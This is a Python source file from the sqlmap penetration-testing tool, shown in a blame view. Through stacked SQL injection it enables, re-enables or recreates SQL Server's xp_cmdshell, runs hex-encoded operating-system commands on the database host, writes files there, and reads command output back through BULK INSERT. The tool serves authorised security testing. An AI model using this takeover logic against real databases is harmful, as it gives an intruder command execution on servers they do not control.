sqlmap/lib/takeover/xp_cmdshell.py

249 lines
8.9 KiB
Python
Raw Normal View History

#!/usr/bin/env python
"""
2012-01-11 18:59:46 +04:00
Copyright (c) 2006-2012 sqlmap developers (http://www.sqlmap.org/)
2010-10-15 03:18:29 +04:00
See the file 'doc/COPYING' for copying permission
"""
from lib.core.agent import agent
from lib.core.common import Backend
from lib.core.common import getSPQLSnippet
2012-02-25 14:53:38 +04:00
from lib.core.common import hashDBWrite
from lib.core.common import isNoneValue
from lib.core.common import pushValue
from lib.core.common import popValue
from lib.core.common import randomStr
from lib.core.common import readInput
2010-12-08 17:26:40 +03:00
from lib.core.common import wasLastRequestDelayed
from lib.core.convert import hexencode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
2012-02-15 18:05:50 +04:00
from lib.core.enums import DBMS
2012-02-25 14:53:38 +04:00
from lib.core.enums import HASHDB_KEYS
from lib.core.exception import sqlmapUnsupportedFeatureException
from lib.core.threads import getCurrentThreadData
from lib.core.unescaper import unescaper
from lib.request import inject
class xp_cmdshell:
"""
This class defines methods to deal with Microsoft SQL Server
xp_cmdshell extended procedure for plugins.
"""
def __init__(self):
self.xpCmdshellStr = "master..xp_cmdshell"
def __xpCmdshellCreate(self):
cmd = ""
if Backend.isVersionWithin(("2005", "2008")):
logger.debug("activating sp_OACreate")
2012-07-02 18:28:19 +04:00
cmd = getSPQLSnippet(DBMS.MSSQL, "activate_sp_oacreate")
inject.goStacked(agent.runAsDBMSUser(cmd))
self.__randStr = randomStr(lowercase=True)
2012-07-02 18:28:19 +04:00
self.__xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
self.xpCmdshellStr = "master..%s" % self.__xpCmdshellNew
2012-07-02 18:28:19 +04:00
cmd = getSPQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self.__randStr, XP_CMDSHELL_NEW=self.__xpCmdshellNew)
if Backend.isVersionWithin(("2005", "2008")):
cmd += ";RECONFIGURE WITH OVERRIDE"
inject.goStacked(agent.runAsDBMSUser(cmd))
def __xpCmdshellConfigure2005(self, mode):
2011-04-30 17:20:05 +04:00
debugMsg = "configuring xp_cmdshell using sp_configure "
debugMsg += "stored procedure"
logger.debug(debugMsg)
cmd = getSPQLSnippet(DBMS.MSSQL, "configure_xp_cmdshell", ENABLE=str(mode))
return cmd
def __xpCmdshellConfigure2000(self, mode):
2011-04-30 17:20:05 +04:00
debugMsg = "configuring xp_cmdshell using sp_addextendedproc "
debugMsg += "stored procedure"
logger.debug(debugMsg)
if mode == 1:
2012-07-02 15:50:26 +04:00
cmd = getSPQLSnippet(DBMS.MSSQL, "enable_xp_cmdshell_2000", ENABLE=str(mode))
else:
2012-07-02 15:50:26 +04:00
cmd = getSPQLSnippet(DBMS.MSSQL, "disable_xp_cmdshell_2000", ENABLE=str(mode))
return cmd
def __xpCmdshellConfigure(self, mode):
if Backend.isVersionWithin(("2005", "2008")):
cmd = self.__xpCmdshellConfigure2005(mode)
else:
cmd = self.__xpCmdshellConfigure2000(mode)
inject.goStacked(agent.runAsDBMSUser(cmd))
def __xpCmdshellCheck(self):
2012-07-02 02:31:45 +04:00
cmd = "ping -n %d 127.0.0.1" % (conf.timeSec * 2)
self.xpCmdshellExecCmd(cmd)
2010-12-08 17:26:40 +03:00
2011-02-07 15:32:08 +03:00
return wasLastRequestDelayed()
def __xpCmdshellTest(self):
threadData = getCurrentThreadData()
pushValue(threadData.disableStdOut)
threadData.disableStdOut = True
logger.info("testing if xp_cmdshell extended procedure is usable")
output = self.evalCmd("echo 1")
if isNoneValue(output):
errMsg = "it seems that the temporary directory ('%s') used for " % self.getRemoteTempPath()
errMsg += "storing console output within the back-end file system "
errMsg += "does not have writing permissions for the DBMS process. "
errMsg += "You are advised to manually adjust it with option "
errMsg += "--tmp-path switch or you will not be able to retrieve "
errMsg += "the commands output"
logger.error(errMsg)
else:
logger.info("xp_cmdshell extended procedure is usable")
threadData.disableStdOut = popValue()
def xpCmdshellWriteFile(self, fileContent, tmpPath, randDestFile):
echoedLines = []
cmd = ""
charCounter = 0
maxLen = 512
if isinstance(fileContent, (set, list, tuple)):
lines = fileContent
else:
lines = fileContent.split("\n")
for line in lines:
echoedLine = "echo %s " % line
echoedLine += ">> \"%s\%s\"" % (tmpPath, randDestFile)
echoedLines.append(echoedLine)
for echoedLine in echoedLines:
cmd += "%s & " % echoedLine
charCounter += len(echoedLine)
if charCounter >= maxLen:
self.xpCmdshellExecCmd(cmd)
cmd = ""
charCounter = 0
if cmd:
self.xpCmdshellExecCmd(cmd)
def xpCmdshellForgeCmd(self, cmd):
self.__randStr = randomStr(lowercase=True)
self.__cmd = "0x%s" % hexencode(cmd)
self.__forgedCmd = "DECLARE @%s VARCHAR(8000);" % self.__randStr
self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)
return agent.runAsDBMSUser(self.__forgedCmd)
def xpCmdshellExecCmd(self, cmd, silent=False):
cmd = self.xpCmdshellForgeCmd(cmd)
return inject.goStacked(cmd, silent)
def xpCmdshellEvalCmd(self, cmd, first=None, last=None):
self.getRemoteTempPath()
if conf.direct:
output = self.xpCmdshellExecCmd(cmd)
if output and isinstance(output, (list, tuple)):
new_output = ""
for line in output:
if line == "NULL":
new_output += "\n"
else:
new_output += "%s\n" % line.strip("\r")
output = new_output
else:
tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
cmd = "%s > \"%s\"" % (cmd, tmpFile)
self.xpCmdshellExecCmd(cmd)
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, tmpFile, randomStr(10), randomStr(10)))
self.delRemoteFile(tmpFile)
output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, firstChar=first, lastChar=last, safeCharEncode=False)
inject.goStacked("DELETE FROM %s" % self.cmdTblName)
if output and isinstance(output, (list, tuple)):
output = output[0]
if output and isinstance(output, (list, tuple)):
output = output[0]
return output
def xpCmdshellInit(self):
2012-02-25 14:53:38 +04:00
if not kb.xpCmdshellAvailable:
2011-04-30 17:20:05 +04:00
infoMsg = "checking if xp_cmdshell extended procedure is "
infoMsg += "available, please wait.."
logger.info(infoMsg)
result = self.__xpCmdshellCheck()
if result:
logger.info("xp_cmdshell extended procedure is available")
kb.xpCmdshellAvailable = True
else:
2011-04-30 17:20:05 +04:00
message = "xp_cmdshell extended procedure does not seem to "
message += "be available. Do you want sqlmap to try to "
message += "re-enable it? [Y/n] "
2011-04-30 17:20:05 +04:00
choice = readInput(message, default="Y")
if not choice or choice in ("y", "Y"):
self.__xpCmdshellConfigure(1)
if self.__xpCmdshellCheck():
logger.info("xp_cmdshell re-enabled successfully")
kb.xpCmdshellAvailable = True
else:
logger.warn("xp_cmdshell re-enabling failed")
logger.info("creating xp_cmdshell with sp_OACreate")
self.__xpCmdshellConfigure(0)
self.__xpCmdshellCreate()
if self.__xpCmdshellCheck():
logger.info("xp_cmdshell created successfully")
kb.xpCmdshellAvailable = True
else:
2011-04-30 17:20:05 +04:00
warnMsg = "xp_cmdshell creation failed, probably "
warnMsg += "because sp_OACreate is disabled"
logger.warn(warnMsg)
2012-02-26 02:54:32 +04:00
hashDBWrite(HASHDB_KEYS.KB_XP_CMDSHELL_AVAILABLE, kb.xpCmdshellAvailable)
if not kb.xpCmdshellAvailable:
errMsg = "unable to proceed without xp_cmdshell"
raise sqlmapUnsupportedFeatureException, errMsg
debugMsg = "creating a support table to write commands standard "
debugMsg += "output to"
logger.debug(debugMsg)
# TEXT can't be used here because in error technique you get:
# "The text, ntext, and image data types cannot be compared or sorted"
self.createSupportTbl(self.cmdTblName, self.tblField, "NVARCHAR(4000)")
self.__xpCmdshellTest()